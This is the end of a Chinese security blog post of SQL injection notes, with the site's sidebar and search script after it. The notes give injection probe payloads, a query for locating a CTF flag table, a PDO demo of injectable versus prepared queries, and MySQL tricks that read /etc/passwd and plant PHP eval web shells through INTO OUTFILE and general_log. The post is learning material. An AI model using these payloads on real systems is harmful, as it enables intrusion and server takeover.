<ul>
<li><code>&#39;</code>有可能没有回显，有报错回显，有waf提示</li>
<li><code>&#39; or 1</code> <code>&#39; or &#39;&#39;=&#39;</code> 看看有没有全部东西出来，主要是看看这种简单的会不会拦截</li>
<li><code>&#39; union select 1,2,3,4 %23</code> 看看能不能使用union查询</li>
<li>还没有信息？尝试下<code>&#39; and sleep(5)--+</code>行不行，如果能的话就说明是可注入的</li>
<li>到现在还没有？？？尝试各种姿势寻找两种回显吧</li>
<li>到此为止如果看到了waf信息，报错信息，就可以着手开始搞了。如果还没有东西，可以开始用burp测试一波敏感字符了，基于看到的特殊信息对上面的payload做出替换后再尝试</li>
<li>如果还没有看到异常情况，那可能点就是封死了，因为能够执行sql的话，上面的结果肯定会有些特殊回显的</li>
</ul>
</li>
<li><p>hctf里遇到了一个比较坑的地方，flag是放在了另一个数据库中，所以一路select database()，然后并没找到奇怪的表，所以在information_schema.tables中使用模糊搜索找找flag关键表<code>select group_concat(table_name) from information_schema.tables where table_name like &#39;%flag%&#39;</code>如果找到了，因为之后要跨数据库去读取表，所以要记得看下表是在哪个数据库里<code>select group_concat(table_schema) from information_schema.tables where table_name = &#39;flag&#39;</code></p>
</li>
<li><p>找时间测试了下PDO的工作流程</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"></div><div class="line"><span class="keyword">try</span>&#123;</div><div class="line">  <span class="comment">//首先进行连接，通过new PDO()函数</span></div><div class="line">    $conn = <span class="keyword">new</span> PDO(<span class="string">"mysql:host=localhost;dbname=blog"</span>,<span class="string">"root"</span>,<span class="string">"root"</span>);</div><div class="line">&#125;<span class="keyword">catch</span>(PDOException $e)&#123;</div><div class="line">    <span class="keyword">die</span>( <span class="string">"Error connecting to SQL Server"</span>.$e-&gt;getMessage() );</div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="comment">//尝试进行一次普通的查询,这里其实并没有用到PDO的预处理特性，只是普通的查询</span></div><div class="line">$sql = <span class="string">"select * from user where username = '$_GET['id']'"</span>;</div><div class="line">$stmt = $conn-&gt;query($sql);</div><div class="line"><span class="keyword">while</span>(@$row = $stmt-&gt;fetch(PDO::FETCH_ASSOC))&#123;</div><div class="line">    var_dump($row);</div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="comment">//使用PDO对sql语句进行预处理再带入查询</span></div><div class="line">$sql = <span class="string">"select * from user where username=?"</span>;</div><div class="line">$stmt = $conn-&gt;prepare($sql);</div><div class="line">$stmt-&gt;bindValue(<span class="number">1</span>,$id);</div><div class="line"><span class="comment">//$arr = array(</span></div><div class="line"><span class="comment">//    ":id" =&gt; $id,</span></div><div class="line"><span class="comment">//);</span></div><div class="line">$stmt-&gt;execute();</div><div class="line">var_dump($stmt);</div><div class="line"><span class="keyword">if</span> (!$stmt)&#123;</div><div class="line">    <span class="keyword">echo</span> $conn-&gt;errorInfo()[<span class="number">2</span>];</div><div class="line">&#125;</div><div class="line"></div><div class="line">测试结果：没有使用预处理的sql存在预期的攻击方式，进行预处理后的语句则不存在注入点。</div></pre></td></tr></table></figure>
</li>
<li><p>如果以root账户登陆，则可以写文件读文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">select load_file(&quot;/etc/passwd&quot;)</div><div class="line">select &apos;&lt;?php @eval($_POST[cmd]); ?&gt;&apos; into outfile &apos;/var/www/shell.php&apos;</div><div class="line"></div><div class="line">几种写法受变量select @@secure_file_priv;控制</div><div class="line">或用show global variables like &apos;%secure_file_priv%&apos;查询</div><div class="line"></div><div class="line">也可以考虑下面这种写法，通过写日志文件的方式</div><div class="line">set global general_log=&apos;on&apos;;</div><div class="line">SET global general_log_file=&apos;D:/phpStudy/WWW/upload/1.php&apos;;</div><div class="line">SELECT &apos;&lt;?php assert($_POST[&quot;cmd&quot;]);?&gt;&apos;;</div></pre></td></tr></table></figure>
<p>​</p>
<p>​</p>
<p>​</p>
</li>
</ol>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/08/31/OAuth授权流程学习以及Turning-Self-XSS-into-Good-XSS/" rel="next" title="OAuth授权流程学习以及Turning Self-XSS into Good-XSS">
                <i class="fa fa-chevron-left"></i> OAuth授权流程学习以及Turning Self-XSS into Good-XSS
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/07/11/全国大学生信息安全竞赛web部分wp/" rel="prev" title="全国大学生信息安全竞赛web部分wp">
                全国大学生信息安全竞赛web部分wp <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC8zMTE1OS83NzA4"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.gif"
               alt="Yiruma" />
          <p class="site-author-name" itemprop="name">Yiruma</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">25</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          

          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#sql盲注"><span class="nav-number">1.</span> <span class="nav-text">sql盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#第一步：字符串截取函数"><span class="nav-number">1.1.</span> <span class="nav-text">第一步：字符串截取函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#第二步：将截取到的字符串段进行比较得到另一个数据"><span class="nav-number">1.2.</span> <span class="nav-text">第二步：将截取到的字符串段进行比较得到另一个数据</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#第三步：产生两种结果"><span class="nav-number">1.3.</span> <span class="nav-text">第三步：产生两种结果</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#基于bool的盲注"><span class="nav-number">1.3.1.</span> <span class="nav-text">基于bool的盲注</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#基于time的盲注"><span class="nav-number">1.3.2.</span> <span class="nav-text">基于time的盲注</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#基于报错的盲注"><span class="nav-number">1.3.3.</span> <span class="nav-text">基于报错的盲注</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#盲注中可能用到的一些点"><span class="nav-number">1.4.</span> <span class="nav-text">盲注中可能用到的一些点</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基于报错的注入-盲注部分前面提到了就不说了"><span class="nav-number">2.</span> <span class="nav-text">基于报错的注入(盲注部分前面提到了就不说了)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#5-7版本以上mysql函数"><span class="nav-number">2.1.</span> <span class="nav-text">5.7版本以上mysql函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#低版本报错方式"><span class="nav-number">2.2.</span> <span class="nav-text">低版本报错方式</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sql过滤统计"><span class="nav-number">3.</span> <span class="nav-text">sql过滤统计</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#报错注入得到表名列名以及不使用列名下的注入"><span class="nav-number">4.</span> <span class="nav-text">报错注入得到表名列名以及不使用列名下的注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#首先是拿到数据库名"><span class="nav-number">4.0.1.</span> <span class="nav-text">首先是拿到数据库名</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#然后是拿表名"><span class="nav-number">4.0.2.</span> <span class="nav-text">然后是拿表名</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#其实到这一步我们就可以直接拿数据了，有下面几种姿势可以在不使用列名的情况下拿到表里的数据"><span class="nav-number">4.0.3.</span> <span class="nav-text">其实到这一步我们就可以直接拿数据了，有下面几种姿势可以在不使用列名的情况下拿到表里的数据</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#最后再介绍下拿列名的做法"><span class="nav-number">4.0.4.</span> <span class="nav-text">最后再介绍下拿列名的做法</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#使用Out-of-Band带外攻击来回显数据"><span class="nav-number">5.</span> <span class="nav-text">使用Out of Band带外攻击来回显数据</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#只能拿当前表内的数据的情况分析"><span class="nav-number">6.</span> <span class="nav-text">只能拿当前表内的数据的情况分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#单引号转义下的注入思路整理"><span class="nav-number">7.</span> <span class="nav-text">单引号转义下的注入思路整理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#非常规的注入做法"><span class="nav-number">8.</span> <span class="nav-text">非常规的注入做法</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#场景一"><span class="nav-number">8.0.1.</span> <span class="nav-text">场景一</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#场景二"><span class="nav-number">8.0.2.</span> <span class="nav-text">场景二</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#场景三"><span class="nav-number">8.0.3.</span> <span class="nav-text">场景三</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#场景四"><span class="nav-number">8.0.4.</span> <span class="nav-text">场景四</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#场景五"><span class="nav-number">8.0.5.</span> <span class="nav-text">场景五</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#关于二次注入"><span class="nav-number">9.</span> <span class="nav-text">关于二次注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#一些零碎记录的点"><span class="nav-number">10.</span> <span class="nav-text">一些零碎记录的点</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Yiruma</span>
  <span id="busuanzi_container_site_pv">
    本站总访问量<span id="busuanzi_value_site_pv"></span>次
</span>
<span id="busuanzi_container_site_uv">
  本站访客数<span id="busuanzi_value_site_uv"></span>人次
</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>


        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>


        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (search_path.endsWith("json")) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>




  
  
  
  <link rel="stylesheet" href="/lib/algolia-instant-search/instantsearch.min.css">

  
  
  <script src="/lib/algolia-instant-search/instantsearch.min.js"></script>
  

  <script src="/js/src/algolia-search.js?v=5.1.1"></script>



  

  

  

  

  

</body>
</html>
